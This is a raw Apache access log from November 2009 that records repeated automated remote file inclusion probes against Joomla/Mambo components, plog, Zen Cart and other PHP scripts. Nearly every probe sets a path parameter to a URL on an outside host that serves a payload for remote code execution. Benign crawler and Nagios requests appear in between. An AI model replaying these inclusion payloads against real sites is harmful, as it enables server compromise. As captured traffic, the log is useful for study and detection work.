72.11.145.8 - - [26/Nov/2009:05:33:56 -0500] "GET /logs/error_log.Q109110500//admin/classes/TplLoad.php?full_path_to_public_program=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.148.64.25 - - [26/Nov/2009:05:34:16 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://kb27.co.kr/bbs///test.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.148.64.25 - - [26/Nov/2009:05:34:16 -0500] "GET //components/com_virtuemart/errors.php?error=http://kb27.co.kr/bbs///test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
114.108.177.238 - - [26/Nov/2009:05:34:22 -0500] "GET /logs/access_log.Q109091100//doceboCms/class/class.dashboard_cms.php?where_framework=http://design.rightside.ru//appserv/all.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:25 -0500] "GET //include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:25 -0500] "GET /logs//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:25 -0500] "GET /logs/error_log.Q109052900//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:25 -0500] "GET /logs/error_log.Q109061800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:43 -0500] "GET //include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:43 -0500] "GET /logs//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:43 -0500] "GET /logs/error_log.Q109052900//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:35:43 -0500] "GET /logs/error_log.Q109061800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:05:35:57 -0500] "GET /logs/access_log.Q109072800//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 379 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:36:04 -0500] "GET /logs/error_log.Q109110100%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:36:39 -0500] "GET /logs/error_log.Q109061600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:36:53 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:36:53 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.65.68 - - [26/Nov/2009:05:37:06 -0500] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.68 - - [26/Nov/2009:05:37:07 -0500] "GET /logs/ HTTP/1.1" 200 27548 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.200.255.18 - - [26/Nov/2009:05:37:07 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
193.200.255.18 - - [26/Nov/2009:05:37:11 -0500] "GET /logs/error_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
190.97.219.4 - - [26/Nov/2009:05:37:16 -0500] "GET /logs/access_log.Q109081500/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:37:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [26/Nov/2009:05:37:24 -0500] "GET /logs/access_log.Q109091100%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:37:51 -0500] "GET /logs/error_log.Q109071000//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:37:56 -0500] "GET /logs/error_log.Q109070400//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:05:38:02 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nsm5club.com//bbs//QQ_LBS/psybnc/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:05:38:02 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nsm5club.com//bbs//QQ_LBS/psybnc/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:05:38:02 -0500] "GET /logs/access_log.Q109092200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nsm5club.com//bbs//QQ_LBS/psybnc/id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:38:04 -0500] "GET /logs/error_log.Q109071000//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:38:32 -0500] "GET /logs/error_log.Q109061600%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:05:38:53 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nsm5club.com//bbs//QQ_LBS/psybnc/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:05:38:53 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nsm5club.com//bbs//QQ_LBS/psybnc/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.103.72.130 - - [26/Nov/2009:05:38:53 -0500] "GET /logs/access_log.Q109092200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.nsm5club.com//bbs//QQ_LBS/psybnc/id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:41:08 -0500] "GET /logs/error_log.Q109071000//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:41:18 -0500] "GET /logs/error_log.Q109070400//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:41:35 -0500] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:41:43 -0500] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:42:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.75.77 - - [26/Nov/2009:05:42:33 -0500] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:42:45 -0500] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:45:05 -0500] "GET /logs/error_log.Q109081000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
95.110.225.160 - - [26/Nov/2009:05:45:46 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ubuntu123.fileave.com/test.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
95.110.225.160 - - [26/Nov/2009:05:45:46 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ubuntu123.fileave.com/test.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
72.11.145.8 - - [26/Nov/2009:05:47:04 -0500] "GET //admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:47:04 -0500] "GET /logs/access_log.Q109051200%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:47:04 -0500] "GET /logs//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.65.68 - - [26/Nov/2009:05:47:08 -0500] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Nov/2009:05:47:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [26/Nov/2009:05:47:30 -0500] "GET /logs/access_log.Q109051500%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:47:41 -0500] "GET //admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:47:41 -0500] "GET /logs//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:47:41 -0500] "GET /logs/access_log.Q109051200%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:48:13 -0500] "GET /logs/access_log.Q109051500%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:49:02 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:49:02 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 27555 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:49:06 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:49:06 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 27555 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:49:09 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:49:09 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 27555 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:14 -0500] "GET //admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:14 -0500] "GET /logs//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:14 -0500] "GET /logs/access_log.Q109051200%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:53 -0500] "GET //admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:53 -0500] "GET /logs//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:53 -0500] "GET /logs/access_log.Q109051200%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:49:55 -0500] "GET /logs/access_log.Q109051500%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:50:14 -0500] "GET /logs/access_log.Q109051500%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:51:09 -0500] "GET /phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:51:09 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:51:09 -0500] "GET /logs/access_log.Q109082000/phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:51:16 -0500] "GET /logs//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:51:16 -0500] "GET //admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:51:16 -0500] "GET /logs/access_log.Q109051200%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:52:48 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:52:48 -0500] "GET /phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:52:48 -0500] "GET /logs/error_log.Q109081000%20%20/phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:52:59 -0500] "GET /logs/access_log.Q109050800%20%20/phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:05:52:20 -0500] "GET /logs/error_log.Q109101500 HTTP/1.0" 200 3785191 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.131.226.52 - - [26/Nov/2009:05:53:18 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:05:53:18 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:05:53:18 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.195.111.169 - - [26/Nov/2009:05:52:20 -0500] "GET /logs/access_log.Q109070200 HTTP/1.0" 200 5653087 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.233.89.196 - - [26/Nov/2009:05:53:19 -0500] "GET /logs//zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:53:19 -0500] "GET //zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:53:28 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:53:28 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:53:28 -0500] "GET /logs/access_log.Q109091100%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:53:39 -0500] "GET /logs/access_log.Q109051200%20%20//zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:05:53:43 -0500] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:05:53:43 -0500] "GET /logs/access_log.Q109051500/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:05:53:43 -0500] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:05:54:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [26/Nov/2009:05:54:15 -0500] "GET /logs/error_log.Q109061100%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:05:54:34 -0500] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:05:54:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:05:54:34 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:39 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:39 -0500] "GET /logs/access_log.Q109091100%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:40 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:45 -0500] "GET /logs/access_log.Q109051600//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:45 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:45 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.7.179.100 - - [26/Nov/2009:05:54:49 -0500] "GET /logs/error_log.Q109081000/phphtml.php?htmlclass_path=http://www.anginbali.com//filemgmt_data/files/togle/1.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:50 -0500] "GET /logs/error_log.Q109051500//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:54:57 -0500] "GET /logs/access_log.Q109070500//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:55:03 -0500] "GET /logs/error_log.Q109061100//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:05:54:29 -0500] "GET /logs/access_log.Q109112300 HTTP/1.0" 200 5876924 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.233.89.196 - - [26/Nov/2009:05:55:35 -0500] "GET /logs/access_log.Q109051500%20%20//admin/plog-admin-functions.php?configbasedir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.195.114.54 - - [26/Nov/2009:05:55:25 -0500] "GET /logs/access_log.Q109061900 HTTP/1.0" 200 3745986 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.131.226.52 - - [26/Nov/2009:05:56:39 -0500] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:56:40 -0500] "GET /logs/access_log.Q109082900%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:56:40 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:56:40 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:56:43 -0500] "GET /logs/access_log.Q109051500%20%20//zero_vote/ask_password.php?dir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.65.67 - - [26/Nov/2009:05:56:44 -0500] "GET /images/items/index5_spat_oste.jpg HTTP/1.1" 200 1734 "-" "Googlebot-Image/1.0"
64.22.119.110 - - [26/Nov/2009:05:56:56 -0500] "GET /logs/access_log.Q109051200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://urbanbreaks.com/images/id.jpg%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
64.22.119.110 - - [26/Nov/2009:05:56:56 -0500] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://urbanbreaks.com/images/id.jpg%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
64.22.119.110 - - [26/Nov/2009:05:56:56 -0500] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://urbanbreaks.com/images/id.jpg%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
219.93.18.98 - - [26/Nov/2009:05:56:57 -0500] "GET //modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.masuccessguy.com//audio/swf? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.93.18.98 - - [26/Nov/2009:05:56:57 -0500] "GET /logs/access_log.Q109052600//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.masuccessguy.com//audio/swf? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.249.65.68 - - [26/Nov/2009:05:57:08 -0500] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.142.75.77 - - [26/Nov/2009:05:57:13 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:57:13 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
202.131.226.52 - - [26/Nov/2009:05:57:31 -0500] "GET /logs/access_log.Q109093000%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:57:40 -0500] "GET //class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:57:40 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:58:22 -0500] "GET /logs//class/class.dashboard_cms.php?where_framework=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
